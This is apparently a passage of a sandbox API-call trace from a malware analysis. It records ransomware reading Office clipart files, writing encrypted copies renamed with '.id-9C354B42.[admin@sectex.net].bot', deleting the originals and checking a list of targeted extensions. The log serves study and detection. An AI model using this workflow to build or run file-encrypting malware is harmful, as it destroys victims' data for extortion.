	[0155.971] GetLastError () returned 0x0
	[0155.971] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1434, lpOverlapped=0x0) returned 1
	[0156.051] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1440, lpOverlapped=0x0) returned 1
	[0156.052] ReadFile (in: hFile=0x268, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.052] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.052] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.052] CloseHandle (hObject=0x3d4) returned 1
	[0156.052] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.052] SetEndOfFile (hFile=0x268) returned 1
	[0156.054] CloseHandle (hObject=0x268) returned 1
	[0156.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.200] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf")) returned 1
	[0156.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.313] lstrlenW (lpString=".doc") returned 4
	[0156.313] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.313] lstrlenW (lpString=".docx") returned 5
	[0156.313] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0156.313] lstrlenW (lpString=".pdf") returned 4
	[0156.313] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.313] lstrlenW (lpString=".xls") returned 4
	[0156.313] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.313] lstrlenW (lpString=".xlsx") returned 5
	[0156.313] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0156.313] lstrlenW (lpString=".ppt") returned 4
	[0156.313] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.313] lstrlenW (lpString=".zip") returned 4
	[0156.313] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.313] lstrlenW (lpString=".rar") returned 4
	[0156.313] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.313] lstrlenW (lpString=".bz2") returned 4
	[0156.313] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.313] lstrlenW (lpString=".7z") returned 3
	[0156.313] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.313] lstrlenW (lpString=".dbf") returned 4
	[0156.313] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.314] lstrlenW (lpString=".1cd") returned 4
	[0156.314] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.314] lstrlenW (lpString=".jpg") returned 4
	[0156.314] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.314] lstrlenW (lpString=".doc") returned 4
	[0156.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString=".docx") returned 5
	[0156.314] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0156.314] lstrlenW (lpString=".pdf") returned 4
	[0156.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString=".xls") returned 4
	[0156.314] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.314] lstrlenW (lpString=".xlsx") returned 5
	[0156.314] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0156.314] lstrlenW (lpString=".ppt") returned 4
	[0156.314] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.314] lstrlenW (lpString=".zip") returned 4
	[0156.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.314] lstrlenW (lpString=".rar") returned 4
	[0156.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString=".bz2") returned 4
	[0156.314] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.314] lstrlenW (lpString=".7z") returned 3
	[0156.314] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.315] lstrlenW (lpString=".dbf") returned 4
	[0156.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.315] lstrlenW (lpString=".1cd") returned 4
	[0156.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF") returned 63
	[0156.315] lstrlenW (lpString=".jpg") returned 4
	[0156.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.315] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.315] lstrlenW (lpString="J0105238.WMF") returned 12
	[0156.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.326] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=17172) returned 1
	[0156.326] CloseHandle (hObject=0x388) returned 1
	[0156.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf")) returned 0x20
	[0156.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.327] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.327] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0156.327] GetLastError () returned 0x0
	[0156.327] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4314, lpOverlapped=0x0) returned 1
	[0156.353] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4320, lpOverlapped=0x0) returned 1
	[0156.354] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.355] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.355] SetEndOfFile (hFile=0x3a0) returned 1
	[0156.355] CloseHandle (hObject=0x3a0) returned 1
	[0156.355] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.355] SetEndOfFile (hFile=0x388) returned 1
	[0156.366] CloseHandle (hObject=0x388) returned 1
	[0156.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf")) returned 1
	[0156.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.367] lstrlenW (lpString=".doc") returned 4
	[0156.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.367] lstrlenW (lpString=".docx") returned 5
	[0156.367] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0156.367] lstrlenW (lpString=".pdf") returned 4
	[0156.367] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.367] lstrlenW (lpString=".xls") returned 4
	[0156.367] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.367] lstrlenW (lpString=".xlsx") returned 5
	[0156.367] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0156.367] lstrlenW (lpString=".ppt") returned 4
	[0156.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.368] lstrlenW (lpString=".zip") returned 4
	[0156.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.368] lstrlenW (lpString=".rar") returned 4
	[0156.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString=".bz2") returned 4
	[0156.368] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString=".7z") returned 3
	[0156.368] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.368] lstrlenW (lpString=".dbf") returned 4
	[0156.368] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.368] lstrlenW (lpString=".1cd") returned 4
	[0156.368] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.368] lstrlenW (lpString=".jpg") returned 4
	[0156.368] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.368] lstrlenW (lpString=".doc") returned 4
	[0156.368] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString=".docx") returned 5
	[0156.368] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0156.368] lstrlenW (lpString=".pdf") returned 4
	[0156.368] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.368] lstrlenW (lpString=".xls") returned 4
	[0156.368] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.368] lstrlenW (lpString=".xlsx") returned 5
	[0156.368] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0156.369] lstrlenW (lpString=".ppt") returned 4
	[0156.369] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.369] lstrlenW (lpString=".zip") returned 4
	[0156.369] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.369] lstrlenW (lpString=".rar") returned 4
	[0156.369] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.369] lstrlenW (lpString=".bz2") returned 4
	[0156.369] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.369] lstrlenW (lpString=".7z") returned 3
	[0156.369] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.369] lstrlenW (lpString=".dbf") returned 4
	[0156.369] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.369] lstrlenW (lpString=".1cd") returned 4
	[0156.369] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned 63
	[0156.369] lstrlenW (lpString=".jpg") returned 4
	[0156.369] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.369] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.369] lstrlenW (lpString="J0105244.WMF") returned 12
	[0156.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.370] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=11228) returned 1
	[0156.370] CloseHandle (hObject=0x388) returned 1
	[0156.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf")) returned 0x20
	[0156.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.371] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.371] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0156.371] GetLastError () returned 0x0
	[0156.371] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2bdc, lpOverlapped=0x0) returned 1
	[0156.431] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2be0, lpOverlapped=0x0) returned 1
	[0156.432] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.432] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.432] SetEndOfFile (hFile=0x3a0) returned 1
	[0156.432] CloseHandle (hObject=0x3a0) returned 1
	[0156.432] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.432] SetEndOfFile (hFile=0x388) returned 1
	[0156.435] CloseHandle (hObject=0x388) returned 1
	[0156.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.435] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf")) returned 1
	[0156.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.436] lstrlenW (lpString=".doc") returned 4
	[0156.436] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString=".docx") returned 5
	[0156.436] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0156.436] lstrlenW (lpString=".pdf") returned 4
	[0156.436] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString=".xls") returned 4
	[0156.436] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.436] lstrlenW (lpString=".xlsx") returned 5
	[0156.436] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0156.436] lstrlenW (lpString=".ppt") returned 4
	[0156.436] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.436] lstrlenW (lpString=".zip") returned 4
	[0156.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.436] lstrlenW (lpString=".rar") returned 4
	[0156.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString=".bz2") returned 4
	[0156.436] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString=".7z") returned 3
	[0156.436] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.436] lstrlenW (lpString=".dbf") returned 4
	[0156.436] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.436] lstrlenW (lpString=".1cd") returned 4
	[0156.436] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.436] lstrlenW (lpString=".jpg") returned 4
	[0156.436] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.437] lstrlenW (lpString=".doc") returned 4
	[0156.437] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString=".docx") returned 5
	[0156.437] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0156.437] lstrlenW (lpString=".pdf") returned 4
	[0156.437] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString=".xls") returned 4
	[0156.437] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.437] lstrlenW (lpString=".xlsx") returned 5
	[0156.437] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0156.437] lstrlenW (lpString=".ppt") returned 4
	[0156.437] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.437] lstrlenW (lpString=".zip") returned 4
	[0156.437] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.437] lstrlenW (lpString=".rar") returned 4
	[0156.437] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString=".bz2") returned 4
	[0156.437] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString=".7z") returned 3
	[0156.437] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.437] lstrlenW (lpString=".dbf") returned 4
	[0156.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.437] lstrlenW (lpString=".1cd") returned 4
	[0156.437] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63
	[0156.437] lstrlenW (lpString=".jpg") returned 4
	[0156.437] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.438] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.438] lstrlenW (lpString="J0105266.WMF") returned 12
	[0156.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.457] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5908) returned 1
	[0156.457] CloseHandle (hObject=0x3c0) returned 1
	[0156.457] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf")) returned 0x20
	[0156.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.460] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.460] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.460] GetLastError () returned 0x0
	[0156.460] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1714, lpOverlapped=0x0) returned 1
